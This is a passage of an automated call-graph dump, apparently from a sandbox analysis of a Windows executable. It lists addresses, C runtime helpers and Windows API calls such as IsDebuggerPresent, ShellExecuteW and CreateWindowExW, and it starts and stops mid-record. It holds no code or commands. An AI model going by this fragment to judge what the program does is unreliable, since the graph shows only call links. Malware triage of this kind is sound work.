46 API calls 3 library calls 86489->86543 86490->86480 86490->86482 86490->86483 86490->86489 86490->86490 86492 41f595 86491->86492 86493 41f599 86491->86493 86492->86438 86568 416b04 86493->86568 86495 41f5bb _memmove 86496 41f5c2 FreeEnvironmentStringsW 86495->86496 86496->86438 86498 41f50b _wparse_cmdline 86497->86498 86499 416b04 __malloc_crt 46 API calls 86498->86499 86500 41f54e _wparse_cmdline 86498->86500 86499->86500 86500->86440 86502 41f2bc _wcslen 86501->86502 86506 41f2b4 86501->86506 86503 416b49 __calloc_crt 46 API calls 86502->86503 86508 41f2e0 _wcslen 86503->86508 86504 41f336 86575 413748 86504->86575 86506->86443 86507 416b49 __calloc_crt 46 API calls 86507->86508 86508->86504 86508->86506 86508->86507 86509 41f35c 86508->86509 86512 41f373 86508->86512 86574 41ef12 46 API calls __tsopen_nolock 86508->86574 86511 413748 _free 46 API calls 86509->86511 86511->86506 86581 417ed3 86512->86581 86514 41f37f 86514->86443 86516 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86515->86516 86518 411750 __IsNonwritableInCurrentImage 86516->86518 86600 41130a 51 API calls __cinit 86516->86600 86518->86448 86520 42e2f3 86519->86520 86521 40d6cc 86519->86521 86601 408f40 86521->86601 86523 40d707 86605 40ebb0 86523->86605 86526 40d737 86608 411951 86526->86608 86531 40d751 86620 40f4e0 SystemParametersInfoW SystemParametersInfoW 86531->86620 86533 40d75f 86621 40d590 GetCurrentDirectoryW 86533->86621 86535 40d767 SystemParametersInfoW 86536 40d78d 86535->86536 86537 408f40 VariantClear 86536->86537 86538 40d79d 86537->86538 86539 408f40 VariantClear 86538->86539 86540 40d7a6 86539->86540 86540->86453 86547 4118da 46 API calls _doexit 86540->86547 86541->86426 86542->86430 86547->86453 86548->86456 86549->86464 86550->86472 86553 416b52 86551->86553 86554 416b8f 86553->86554 86555 416b70 Sleep 86553->86555 86559 41f677 86553->86559 86554->86470 86554->86475 86556 416b85 86555->86556 86556->86553 86556->86554 86557->86477 86558->86467 86560 41f683 86559->86560 86566 41f69e _malloc 86559->86566 86561 41f68f 86560->86561 86560->86566 86567 417f77 46 API calls __getptd_noexit 86561->86567 86563 41f6b1 HeapAlloc 86565 41f6d8 86563->86565 86563->86566 86564 41f694 86564->86553 86565->86553 86566->86563 86566->86565 86567->86564 86571 416b0d 86568->86571 86569 4135bb _malloc 45 API calls 86569->86571 86570 416b43 86570->86495 86571->86569 86571->86570 86572 416b24 Sleep 86571->86572 86573 416b39 86572->86573 86573->86570 86573->86571 86574->86508 86576 41377c _free 86575->86576 86577 413753 RtlFreeHeap 86575->86577 86576->86506 86577->86576 86578 413768 86577->86578 86584 417f77 46 API calls __getptd_noexit 86578->86584 86580 41376e GetLastError 86580->86576 86585 417daa 86581->86585 86584->86580 86586 417dc9 __recalloc __call_reportfault 86585->86586 86587 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86586->86587 86588 417eb5 __call_reportfault 86587->86588 86591 41a208 86588->86591 86590 417ed1 GetCurrentProcess TerminateProcess 86590->86514 86592 41a210 86591->86592 86593 41a212 IsDebuggerPresent 86591->86593 86592->86590 86599 41fe19 86593->86599 86596 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86597 421ff8 GetCurrentProcess TerminateProcess 86596->86597 86598 421ff0 __call_reportfault 86596->86598 86597->86590 86598->86597 86599->86596 86600->86518 86602 408f48 ctype 86601->86602 86603 4265c7 VariantClear 86602->86603 86604 408f55 ctype 86602->86604 86603->86604 86604->86523 86661 40ebd0 86605->86661 86665 4182cb 86608->86665 86610 41195e 86672 4181f2 LeaveCriticalSection 86610->86672 86612 40d748 86613 4119b0 86612->86613 86614 4119d6 86613->86614 86615 4119bc 86613->86615 86614->86531 86615->86614 86707 417f77 46 API calls __getptd_noexit 86615->86707 86617 4119c6 86708 417f25 10 API calls __tsopen_nolock 86617->86708 86619 4119d1 86619->86531 86620->86533 86709 401f20 86621->86709 86623 40d5b6 IsDebuggerPresent 86624 40d5c4 86623->86624 86625 42e1bb MessageBoxA 86623->86625 86626 42e1d4 86624->86626 86627 40d5e3 86624->86627 86625->86626 86881 403a50 52 API calls 3 library calls 86626->86881 86779 40f520 86627->86779 86631 40d5fd GetFullPathNameW 86791 401460 86631->86791 86633 40d63b 86634 40d643 86633->86634 86635 42e231 SetCurrentDirectoryW 86633->86635 86636 40d64c 86634->86636 86882 432fee 6 API calls 86634->86882 86635->86634 86806 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86636->86806 86639 42e252 86639->86636 86641 42e25a GetModuleFileNameW 86639->86641 86643 42e274 86641->86643 86644 42e2cb GetForegroundWindow ShellExecuteW 86641->86644 86883 401b10 86643->86883 86646 40d688 86644->86646 86645 40d656 86648 40d669 86645->86648 86651 40e0c0 74 API calls 86645->86651 86653 40d692 SetCurrentDirectoryW 86646->86653 86814 4091e0 86648->86814 86651->86648 86653->86535 86655 42e28d 86890 40d200 52 API calls 2 library calls 86655->86890 86658 42e299 GetForegroundWindow ShellExecuteW 86659 42e2c6 86658->86659 86659->86646 86660 40ec00 LoadLibraryA GetProcAddress 86660->86526 86662 40d72e 86661->86662 86663 40ebd6 LoadLibraryA 86661->86663 86662->86526 86662->86660 86663->86662 86664 40ebe7 GetProcAddress 86663->86664 86664->86662 86666 4182e0 86665->86666 86667 4182f3 EnterCriticalSection 86665->86667 86673 418209 86666->86673 86667->86610 86669 4182e6 86669->86667 86700 411924 46 API calls 3 library calls 86669->86700 86672->86612 86674 418215 __tsopen_nolock 86673->86674 86675 418225 86674->86675 86676 41823d 86674->86676 86701 418901 46 API calls __NMSG_WRITE 86675->86701 86678 416b04 __malloc_crt 45 API calls 86676->86678 86684 41824b __tsopen_nolock 86676->86684 86680 418256 86678->86680 86679 41822a 86702 418752 46 API calls 6 library calls 86679->86702 86682 41825d 86680->86682 86683 41826c 86680->86683 86704 417f77 46 API calls __getptd_noexit 86682->86704 86687 4182cb __lock 45 API calls 86683->86687 86684->86669 86685 418231 86703 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86685->86703 86690 418273 86687->86690 86691 4182a6 86690->86691 86692 41827b InitializeCriticalSectionAndSpinCount 86690->86692 86693 413748 _free 45 API calls 86691->86693 86694 418297 86692->86694 86695 41828b 86692->86695 86693->86694 86706 4182c2 LeaveCriticalSection _doexit 86694->86706 86696 413748 _free 45 API calls 86695->86696 86698 418291 86696->86698 86705 417f77 46 API calls __getptd_noexit 86698->86705 86701->86679 86702->86685 86704->86684 86705->86694 86706->86684 86707->86617 86708->86619 86891 40e6e0 86709->86891 86713 401f41 GetModuleFileNameW 86909 410100 86713->86909 86715 401f5c 86921 410960 86715->86921 86718 401b10 52 API calls 86719 401f81 86718->86719 86924 401980 86719->86924 86721 401f8e 86722 408f40 VariantClear 86721->86722 86723 401f9d 86722->86723 86724 401b10 52 API calls 86723->86724 86725 401fb4 86724->86725 86726 401980 53 API calls 86725->86726 86727 401fc3 86726->86727 86728 401b10 52 API calls 86727->86728 86729 401fd2 86728->86729 86932 40c2c0 86729->86932 86731 401fe1 86732 40bc70 52 API calls 86731->86732 86733 401ff3 86732->86733 86950 401a10 86733->86950 86735 401ffe 86957 4114ab 86735->86957 86738 428b05 86740 401a10 52 API calls 86738->86740 86739 402017 86741 4114ab __wcsicoll 58 API calls 86739->86741 86742 428b18 86740->86742 86743 402022 86741->86743 86745 401a10 52 API calls 86742->86745 86743->86742 86744 40202d 86743->86744 86746 4114ab __wcsicoll 58 API calls 86744->86746 86747 428b33 86745->86747 86748 402038 86746->86748 86750 428b3b GetModuleFileNameW 86747->86750 86749 402043 86748->86749 86748->86750 86751 4114ab __wcsicoll 58 API calls 86749->86751 86752 401a10 52 API calls 86750->86752 86753 40204e 86751->86753 86754 428b6c 86752->86754 86759 401a10 52 API calls 86753->86759 86761 428b90 _wcscpy 86753->86761 86770 402092 86753->86770 86755 40e0a0 52 API calls 86754->86755 86757 428b7a 86755->86757 86756 4020a3 86758 428bc6 86756->86758 86965 40e830 53 API calls 86756->86965 86760 401a10 52 API calls 86757->86760 86766 402073 _wcscpy 86759->86766 86763 428b88 86760->86763 86764 401a10 52 API calls 86761->86764 86763->86761 86774 4020d0 86764->86774 86765 4020bb 86966 40cf00 53 API calls 86765->86966 86768 401a10 52 API calls 86766->86768 86768->86770 86769 4020c6 86771 408f40 VariantClear 86769->86771 86770->86756 86770->86761 86771->86774 86772 402110 86776 408f40 VariantClear 86772->86776 86774->86772 86777 401a10 52 API calls 86774->86777 86967 40cf00 53 API calls 86774->86967 86968 40e6a0 53 API calls 86774->86968 86778 402120 ctype 86776->86778 86777->86774 86778->86623 86780 4295c9 __recalloc 86779->86780 86781 40f53c 86779->86781 86783 4295d9 GetOpenFileNameW 86780->86783 87647 410120 86781->87647 86783->86781 86785 40d5f5 86783->86785 86784 40f545 87651 4102b0 SHGetMalloc 86784->87651 86785->86631 86785->86633 86787 40f54c 87656 410190 GetFullPathNameW 86787->87656 86789 40f559 87667 40f570 86789->87667 87729 402400 86791->87729 86793 40146f 86796 428c29 _wcscat 86793->86796 87738 401500 86793->87738 86795 40147c 86795->86796 87746 40d440 86795->87746 86798 401489 86798->86796 86799 401491 GetFullPathNameW 86798->86799 86800 402160 52 API calls 86799->86800 86801 4014bb 86800->86801 86802 402160 52 API calls 86801->86802 86803 4014c8 86802->86803 86803->86796 86804 402160 52 API calls 86803->86804 86805 4014ee 86804->86805 86805->86633 86807 428361 86806->86807 86808 4103fc LoadImageW RegisterClassExW 86806->86808 87766 44395e EnumResourceNamesW LoadImageW 86807->87766 87765 410490 7 API calls 86808->87765 86811 40d651 86813 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86811->86813 86812 428368 86813->86645 86815 409202 86814->86815 86816 42d7ad 86814->86816 86874 409216 ctype 86815->86874 88038 410940 329 API calls 86815->88038 88041 45e737 90 API calls 3 library calls 86816->88041 86819 409386 86820 40939c 86819->86820 88039 40f190 10 API calls 86819->88039 86820->86646 86880 401000 Shell_NotifyIconW __recalloc 86820->86880 86822 4095b2 86822->86820 86823 4095bf 86822->86823 88040 401a50 329 API calls 86823->88040 86824 409253 PeekMessageW 86824->86874 86826 40d410 VariantClear 86826->86874 86827 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86827->86820 86829 4095f9 86827->86829 86828 42d8cd Sleep 86828->86874 86833 42e158 TranslateMessage DispatchMessageW GetMessageW 86829->86833 86831 42e13b 88059 40d410 VariantClear 86831->88059 86833->86833 86836 42e188 86833->86836 86835 409567 PeekMessageW 86835->86874 86836->86820 86839 44c29d 52 API calls 86879 4094e0 86839->86879 86840 46f3c1 107 API calls 86840->86874 86841 40e0a0 52 API calls 86841->86874 86842 46fdbf 108 API calls 86842->86879 86843 409551 TranslateMessage DispatchMessageW 86843->86835 86845 42dcd2 WaitForSingleObject 86846 42dcf0 GetExitCodeProcess CloseHandle 86845->86846 86845->86874 88048 40d410 VariantClear 86846->88048 86848 42dd3d Sleep 86848->86879 86849 47d33e 307 API calls 86849->86874 86852 4094cf Sleep 86852->86879 86853 408f40 VariantClear 86853->86879 86855 42d94d timeGetTime 88044 465124 53 API calls 86855->88044 86857 40c620 timeGetTime 86857->86879 86860 465124 53 API calls 86860->86879 86861 42dd89 CloseHandle 86861->86879 86863 42de19 GetExitCodeProcess CloseHandle 86863->86879 86865 401b10 52 API calls 86865->86879 86868 42de88 Sleep 86868->86874 86870 45e737 90 API calls 86870->86874 86873 42e0cc VariantClear 86873->86874 86874->86819 86874->86824 86874->86826 86874->86828 86874->86831 86874->86835 86874->86840 86874->86841 86874->86843 86874->86845 86874->86848 86874->86849 86874->86852 86874->86855 86874->86870 86874->86873 86875 408f40 VariantClear 86874->86875 86874->86879 87767 4091b0 86874->87767 87825 40afa0 86874->87825 87851 408fc0 86874->87851 87886 408cc0 86874->87886 87900 40d150 86874->87900 87905 40d170 86874->87905 87911 4096a0 86874->87911 88042 465124 53 API calls 86874->88042 88043 40c620 timeGetTime 86874->88043 88058 40e270 VariantClear ctype 86874->88058 86875->86874 86877 401980 53 API calls 86877->86879 86879->86839 86879->86842 86879->86853 86879->86857 86879->86860 86879->86861 86879->86863 86879->86865 86879->86868 86879->86874 86879->86877 88045 45178a 54 API calls 86879->88045 88046 47d33e 329 API calls 86879->88046 88047 453bc6 54 API calls 86879->88047 88049 40d410 VariantClear 86879->88049 88050 443d19 67 API calls _wcslen 86879->88050 88051 4574b4 VariantClear 86879->88051 88052 403cd0 86879->88052 88056 4731e1 VariantClear 86879->88056 88057 4331a2 6 API calls 86879->88057 86880->86646 86881->86633 86882->86639 86884 401b16 _wcslen 86883->86884 86885 4115d7 52 API calls 86884->86885 86888 401b63 86884->86888 86886 401b4b _memmove 86885->86886 86887 4115d7 52 API calls 86886->86887 86887->86888 86889 40d200 52 API calls 2 library calls 86888->86889 86889->86655 86890->86658 86892 40bc70 52 API calls 86891->86892 86893 401f31 86892->86893 86894 402560 86893->86894 86895 40256d __write_nolock 86894->86895 86896 402160 52 API calls 86895->86896 86898 402593 86896->86898 86901 4025bd 86898->86901 86969 401c90 86898->86969 86899 4026f0 52 API calls 86899->86901 86900 4026a7 86902 401b10 52 API calls 86900->86902 86907 4026db 86900->86907 86901->86899 86901->86900 86903 401b10 52 API calls 86901->86903 86908 401c90 52 API calls 86901->86908 86972 40d7c0 52 API calls 2 library calls 86901->86972 86904 4026d1 86902->86904 86903->86901 86973 40d7c0 52 API calls 2 library calls 86904->86973 86907->86713 86908->86901 86974 40f760 86909->86974 86912 410118 86912->86715 86914 42805d 86915 42806a 86914->86915 87030 431e58 86914->87030 86917 413748 _free 46 API calls 86915->86917 86918 428078 86917->86918 86919 431e58 82 API calls 86918->86919 86920 428084 86919->86920 86920->86715 86922 4115d7 52 API calls 86921->86922 86923 401f74 86922->86923 86923->86718 86925 4019a3 86924->86925 86931 401985 86924->86931 86926 4019b8 86925->86926 86925->86931 87636 403e10 53 API calls 86926->87636 86928 40199f 86928->86721 86930 4019c4 86930->86721 86931->86928 87635 403e10 53 API calls 86931->87635 86933 40c2c7 86932->86933 86934 40c30e 86932->86934 86935 40c2d3 86933->86935 86942 426c79 86933->86942 86936 40c315 86934->86936 86937 426c2b 86934->86937 87637 403ea0 52 API calls __cinit 86935->87637 86940 40c321 86936->86940 86941 426c5a 86936->86941 86939 426c4b 86937->86939 86943 426c2e 86937->86943 87640 4534e3 52 API calls 86939->87640 87638 403ea0 52 API calls __cinit 86940->87638 87641 4534e3 52 API calls 86941->87641 87642 4534e3 52 API calls 86942->87642 86948 40c2de 86943->86948 87639 4534e3 52 API calls 86943->87639 86948->86731 86951 401a30 86950->86951 86952 401a17 86950->86952 86954 402160 52 API calls 86951->86954 86953 401a2d 86952->86953 87643 403c30 52 API calls _memmove 86952->87643 86953->86735 86956 401a3d 86954->86956 86956->86735 86958 411523 86957->86958 86959 4114ba 86957->86959 87646 4113a8 58 API calls 3 library calls 86958->87646 86961 40200c 86959->86961 87644 417f77 46 API calls __getptd_noexit 86959->87644 86961->86738 86961->86739 86963 4114c6 87645 417f25 10 API calls __tsopen_nolock 86963->87645 86965->86765 86966->86769 86967->86774 86968->86774 86970 4026f0 52 API calls 86969->86970 86971 401c97 86970->86971 86971->86898 86972->86901 86973->86907 87034 40f6f0 86974->87034 86976 40f77b _strcat ctype 87042 40f850 86976->87042 86981 427c2a 87071 414d04 86981->87071 86983 40f7fc 86983->86981 86984 40f804 86983->86984 87058 414a46 86984->87058 86988 40f80e 86988->86912 86993 4528bd 86988->86993 86990 427c59 87077 414fe2 86990->87077 86992 427c79 86994 4150d1 _fseek 81 API calls 86993->86994 86995 452930 86994->86995 87577 452719 86995->87577 86998 452948 86998->86914 86999 414d04 __fread_nolock 61 API calls 87000 452966 86999->87000 87001 414d04 __fread_nolock 61 API calls 87000->87001 87002 452976 87001->87002 87003 414d04 __fread_nolock 61 API calls 87002->87003 87004 45298f 87003->87004 87005 414d04 __fread_nolock 61 API calls 87004->87005 87006 4529aa 87005->87006 87007 4150d1 _fseek 81 API calls 87006->87007 87008 4529c4 87007->87008 87009 4135bb _malloc 46 API calls 87008->87009 87010 4529cf 87009->87010 87011 4135bb _malloc 46 API calls 87010->87011 87012 4529db 87011->87012 87013 414d04 __fread_nolock 61 API calls 87012->87013 87014 4529ec 87013->87014 87015 44afef GetSystemTimeAsFileTime 87014->87015 87016 452a00 87015->87016 87017 452a36 87016->87017 87018 452a13 87016->87018 87020 452aa5 87017->87020 87021 452a3c 87017->87021 87019 413748 _free 46 API calls 87018->87019 87024 452a1c 87019->87024 87023 413748 _free 46 API calls 87020->87023 87583 44b1a9 87021->87583 87026 452aa3 87023->87026 87027 413748 _free 46 API calls 87024->87027 87025 452a9d 87028 413748 _free 46 API calls 87025->87028 87026->86914 87029 452a25 87027->87029 87028->87026 87029->86914 87031 431e64 87030->87031 87032 431e6a 87030->87032 87033 414a46 __fcloseall 82 API calls 87031->87033 87032->86915 87033->87032 87035 425de2 87034->87035 87036 40f6fc _wcslen 87034->87036 87035->86976 87037 40f710 WideCharToMultiByte 87036->87037 87038 40f756 87037->87038 87039 40f728 87037->87039 87038->86976 87040 4115d7 52 API calls 87039->87040 87041 40f735 WideCharToMultiByte 87040->87041 87041->86976 87044 40f85d __recalloc _strlen 87042->87044 87045 40f7ab 87044->87045 87090 414db8 87044->87090 87046 4149c2 87045->87046 87105 414904 87046->87105 87048 40f7e9 87048->86981 87049 40f5c0 87048->87049 87050 40f5cd _strcat __write_nolock _memmove 87049->87050 87051 414d04 __fread_nolock 61 API calls 87050->87051 87053 425d11 87050->87053 87057 40f691 __tzset_nolock 87050->87057 87193 4150d1 87050->87193 87051->87050 87054 4150d1 _fseek 81 API calls 87053->87054 87055 425d33 87054->87055 87056 414d04 __fread_nolock 61 API calls 87055->87056 87056->87057 87057->86983 87059 414a52 __tsopen_nolock 87058->87059 87060 414a64 87059->87060 87061 414a79 87059->87061 87333 417f77 46 API calls __getptd_noexit 87060->87333 87064 415471 __lock_file 47 API calls 87061->87064 87066 414a74 __tsopen_nolock 87061->87066 87063 414a69 87334 417f25 10 API calls __tsopen_nolock 87063->87334 87067 414a92 87064->87067 87066->86988 87317 4149d9 87067->87317 87402 414c76 87071->87402 87073 414d1c 87074 44afef 87073->87074 87570 442c5a 87074->87570 87076 44b00d 87076->86990 87078 414fee __tsopen_nolock 87077->87078 87079 414ffa 87078->87079 87080 41500f 87078->87080 87574 417f77 46 API calls __getptd_noexit 87079->87574 87082 415471 __lock_file 47 API calls 87080->87082 87084 415017 87082->87084 87083 414fff 87575 417f25 10 API calls __tsopen_nolock 87083->87575 87086 414e4e __ftell_nolock 51 API calls 87084->87086 87087 415024 87086->87087 87576 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 87087->87576 87089 41500a __tsopen_nolock 87089->86992 87091 414dd6 87090->87091 87092 414deb 87090->87092 87101 417f77 46 API calls __getptd_noexit 87091->87101 87092->87091 87094 414df2 87092->87094 87103 41b91b 79 API calls 11 library calls 87094->87103 87095 414ddb 87102 417f25 10 API calls __tsopen_nolock 87095->87102 87098 414e18 87099 414de6 87098->87099 87104 418f98 77 API calls 6 library calls 87098->87104 87099->87044 87101->87095 87102->87099 87103->87098 87104->87099 87108 414910 __tsopen_nolock 87105->87108 87106 414923 87161 417f77 46 API calls __getptd_noexit 87106->87161 87108->87106 87110 414951 87108->87110 87109 414928 87162 417f25 10 API calls __tsopen_nolock 87109->87162 87124 41d4d1 87110->87124 87113 414956 87114 41496a 87113->87114 87115 41495d 87113->87115 87116 414992 87114->87116 87117 414972 87114->87117 87163 417f77 46 API calls __getptd_noexit 87115->87163 87141 41d218 87116->87141 87164 417f77 46 API calls __getptd_noexit 87117->87164 87121 414933 __tsopen_nolock @_EH4_CallFilterFunc@8 87121->87048 87125 41d4dd __tsopen_nolock 87124->87125 87126 4182cb __lock 46 API calls 87125->87126 87139 41d4eb 87126->87139 87127 41d560 87166 41d5fb 87127->87166 87128 41d567 87129 416b04 __malloc_crt 46 API calls 87128->87129 87131 41d56e 87129->87131 87131->87127 87133 41d57c InitializeCriticalSectionAndSpinCount 87131->87133 87132 41d5f0 __tsopen_nolock 87132->87113 87134 41d59c 87133->87134 87135 41d5af EnterCriticalSection 87133->87135 87138 413748 _free 46 API calls 87134->87138 87135->87127 87136 418209 __mtinitlocknum 46 API calls 87136->87139 87138->87127 87139->87127 87139->87128 87139->87136 87169 4154b2 47 API calls __lock 87139->87169 87170 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87139->87170 87142 41d23a 87141->87142 87143 41d255 87142->87143 87154 41d26c __wopenfile 87142->87154 87175 417f77 46 API calls __getptd_noexit 87143->87175 87145 41d25a 87176 417f25 10 API calls __tsopen_nolock 87145->87176 87147 41d47a 87180 417f77 46 API calls __getptd_noexit 87147->87180 87148 41d48c 87172 422bf9 87148->87172 87151 41499d 87165 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 87151->87165 87152 41d47f 87181 417f25 10 API calls __tsopen_nolock 87152->87181 87154->87147 87154->87154 87160 41d421 87154->87160 87177 41341f 58 API calls 2 library calls 87154->87177 87156 41d41a 87156->87160 87178 41341f 58 API calls 2 library calls 87156->87178 87158 41d439 87158->87160 87179 41341f 58 API calls 2 library calls 87158->87179 87160->87147 87160->87148 87161->87109 87162->87121 87163->87121 87164->87121 87165->87121 87171 4181f2 LeaveCriticalSection 87166->87171 87168 41d602 87168->87132 87169->87139 87170->87139 87171->87168 87182 422b35 87172->87182 87174 422c14 87174->87151 87175->87145 87176->87151 87177->87156 87178->87158 87179->87160 87180->87152 87181->87151 87184 422b41 __tsopen_nolock 87182->87184 87183 422b54 87185 417f77 __tsopen_nolock 46 API calls 87183->87185 87184->87183 87186 422b8a 87184->87186 87187 422b59 87185->87187 87189 422400 __tsopen_nolock 109 API calls 87186->87189 87188 417f25 __tsopen_nolock 10 API calls 87187->87188 87192 422b63 __tsopen_nolock 87188->87192 87190 422ba4 87189->87190 87191 422bcb __wsopen_helper LeaveCriticalSection 87190->87191 87191->87192 87192->87174 87194 4150dd __tsopen_nolock 87193->87194 87195 4150e9 87194->87195 87196 41510f 87194->87196 87224 417f77 46 API calls __getptd_noexit 87195->87224 87206 415471 87196->87206 87199 4150ee 87225 417f25 10 API calls __tsopen_nolock 87199->87225 87205 4150f9 __tsopen_nolock 87205->87050 87207 415483 87206->87207 87208 4154a5 EnterCriticalSection 87206->87208 87207->87208 87209 41548b 87207->87209 87210 415117 87208->87210 87211 4182cb __lock 46 API calls 87209->87211 87212 415047 87210->87212 87211->87210 87213 415067 87212->87213 87214 415057 87212->87214 87219 415079 87213->87219 87227 414e4e 87213->87227 87282 417f77 46 API calls __getptd_noexit 87214->87282 87218 41505c 87226 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 87218->87226 87244 41443c 87219->87244 87222 4150b9 87257 41e1f4 87222->87257 87224->87199 87225->87205 87226->87205 87228 414e61 87227->87228 87229 414e79 87227->87229 87283 417f77 46 API calls __getptd_noexit 87228->87283 87231 414139 __flush 46 API calls 87229->87231 87233 414e80 87231->87233 87232 414e66 87284 417f25 10 API calls __tsopen_nolock 87232->87284 87235 41e1f4 __write 51 API calls 87233->87235 87236 414e97 87235->87236 87237 414f09 87236->87237 87239 414ec9 87236->87239 87243 414e71 87236->87243 87285 417f77 46 API calls __getptd_noexit 87237->87285 87240 41e1f4 __write 51 API calls 87239->87240 87239->87243 87241 414f64 87240->87241 87242 41e1f4 __write 51 API calls 87241->87242 87241->87243 87242->87243 87243->87219 87245 414477 87244->87245 87246 414455 87244->87246 87250 414139 87245->87250 87246->87245 87247 414139 __flush 46 API calls 87246->87247 87248 414470 87247->87248 87286 41b7b2 77 API calls 4 library calls 87248->87286 87251 414145 87250->87251 87252 41415a 87250->87252 87287 417f77 46 API calls __getptd_noexit 87251->87287 87252->87222 87254 41414a 87288 417f25 10 API calls __tsopen_nolock 87254->87288 87256 414155 87256->87222 87258 41e200 __tsopen_nolock 87257->87258 87259 41e223 87258->87259 87260 41e208 87258->87260 87261 41e22f 87259->87261 87267 41e269 87259->87267 87309 417f8a 46 API calls __getptd_noexit 87260->87309 87311 417f8a 46 API calls __getptd_noexit 87261->87311 87264 41e20d 87310 417f77 46 API calls __getptd_noexit 87264->87310 87266 41e234 87312 417f77 46 API calls __getptd_noexit 87266->87312 87289 41ae56 87267->87289 87270 41e23c 87313 417f25 10 API calls __tsopen_nolock 87270->87313 87271 41e26f 87272 41e291 87271->87272 87273 41e27d 87271->87273 87314 417f77 46 API calls __getptd_noexit 87272->87314 87299 41e17f 87273->87299 87277 41e215 __tsopen_nolock 87277->87218 87278 41e289 87316 41e2c0 LeaveCriticalSection __unlock_fhandle 87278->87316 87279 41e296 87315 417f8a 46 API calls __getptd_noexit 87279->87315 87282->87218 87283->87232 87284->87243 87285->87243 87286->87245 87287->87254 87288->87256 87290 41ae62 __tsopen_nolock 87289->87290 87291 41aebc 87290->87291 87292 4182cb __lock 46 API calls 87290->87292 87293 41aec1 EnterCriticalSection 87291->87293 87294 41aede __tsopen_nolock 87291->87294 87295 41ae8e 87292->87295 87293->87294 87294->87271 87296 41aeaa 87295->87296 87297 41ae97 InitializeCriticalSectionAndSpinCount 87295->87297 87298 41aeec ___lock_fhandle LeaveCriticalSection 87296->87298 87297->87296 87298->87291 87300 41aded __commit 46 API calls 87299->87300 87301 41e18e 87300->87301 87302 41e1a4 SetFilePointer 87301->87302 87303 41e194 87301->87303 87304 41e1bb GetLastError 87302->87304 87306 41e1c3 87302->87306 87305 417f77 __tsopen_nolock 46 API calls 87303->87305 87304->87306 87307 41e199 87305->87307 87306->87307 87308 417f9d __dosmaperr 46 API calls 87306->87308 87307->87278 87308->87307 87309->87264 87310->87277 87311->87266 87312->87270 87313->87277 87314->87279 87315->87278 87316->87277 87318 4149ea 87317->87318 87319 4149fe 87317->87319 87363 417f77 46 API calls __getptd_noexit 87318->87363 87321 4149fa 87319->87321 87323 41443c __flush 77 API calls 87319->87323 87335 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87321->87335 87322 4149ef 87364 417f25 10 API calls __tsopen_nolock 87322->87364 87325 414a0a 87323->87325 87336 41d8c2 87325->87336 87328 414139 __flush 46 API calls 87329 414a18 87328->87329 87340 41d7fe 87329->87340 87331 414a1e 87331->87321 87332 413748 _free 46 API calls 87331->87332 87332->87321 87333->87063 87334->87066 87335->87066 87337 414a12 87336->87337 87338 41d8d2 87336->87338 87337->87328 87338->87337 87339 413748 _free 46 API calls 87338->87339 87339->87337 87341 41d80a __tsopen_nolock 87340->87341 87342 41d812 87341->87342 87343 41d82d 87341->87343 87380 417f8a 46 API calls __getptd_noexit 87342->87380 87345 41d839 87343->87345 87348 41d873 87343->87348 87382 417f8a 46 API calls __getptd_noexit 87345->87382 87346 41d817 87381 417f77 46 API calls __getptd_noexit 87346->87381 87351 41ae56 ___lock_fhandle 48 API calls 87348->87351 87350 41d83e 87383 417f77 46 API calls __getptd_noexit 87350->87383 87354 41d879 87351->87354 87352 41d81f __tsopen_nolock 87352->87331 87357 41d893 87354->87357 87358 41d887 87354->87358 87355 41d846 87384 417f25 10 API calls __tsopen_nolock 87355->87384 87385 417f77 46 API calls __getptd_noexit 87357->87385 87365 41d762 87358->87365 87361 41d88d 87386 41d8ba LeaveCriticalSection __unlock_fhandle 87361->87386 87363->87322 87364->87321 87387 41aded 87365->87387 87367 41d7c8 87400 41ad67 47 API calls __tsopen_nolock 87367->87400 87369 41d772 87369->87367 87371 41aded __commit 46 API calls 87369->87371 87379 41d7a6 87369->87379 87370 41aded __commit 46 API calls 87372 41d7b2 CloseHandle 87370->87372 87375 41d79d 87371->87375 87372->87367 87377 41d7be GetLastError 87372->87377 87373 41d7f2 87373->87361 87374 41d7d0 87374->87373 87401 417f9d 46 API calls 2 library calls 87374->87401 87376 41aded __commit 46 API calls 87375->87376 87376->87379 87377->87367 87379->87367 87379->87370 87380->87346 87381->87352 87382->87350 87383->87355 87384->87352 87385->87361 87386->87352 87388 41ae12 87387->87388 87389 41adfa 87387->87389 87391 417f8a __tsopen_nolock 46 API calls 87388->87391 87394 41ae51 87388->87394 87390 417f8a __tsopen_nolock 46 API calls 87389->87390 87392 41adff 87390->87392 87393 41ae23 87391->87393 87395 417f77 __tsopen_nolock 46 API calls 87392->87395 87396 417f77 __tsopen_nolock 46 API calls 87393->87396 87394->87369 87399 41ae07 87395->87399 87397 41ae2b 87396->87397 87398 417f25 __tsopen_nolock 10 API calls 87397->87398 87398->87399 87399->87369 87400->87374 87401->87373 87403 414c82 __tsopen_nolock 87402->87403 87404 414cc3 87403->87404 87405 414c96 __recalloc 87403->87405 87406 414cbb __tsopen_nolock 87403->87406 87407 415471 __lock_file 47 API calls 87404->87407 87429 417f77 46 API calls __getptd_noexit 87405->87429 87406->87073 87408 414ccb 87407->87408 87415 414aba 87408->87415 87411 414cb0 87430 417f25 10 API calls __tsopen_nolock 87411->87430 87419 414ad8 __recalloc 87415->87419 87421 414af2 87415->87421 87416 414ae2 87482 417f77 46 API calls __getptd_noexit 87416->87482 87418 414ae7 87483 417f25 10 API calls __tsopen_nolock 87418->87483 87419->87416 87419->87421 87426 414b2d 87419->87426 87431 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87421->87431 87423 414c38 __recalloc 87485 417f77 46 API calls __getptd_noexit 87423->87485 87424 414139 __flush 46 API calls 87424->87426 87426->87421 87426->87423 87426->87424 87432 41dfcc 87426->87432 87462 41d8f3 87426->87462 87484 41e0c2 46 API calls 3 library calls 87426->87484 87429->87411 87430->87406 87431->87406 87433 41dfd8 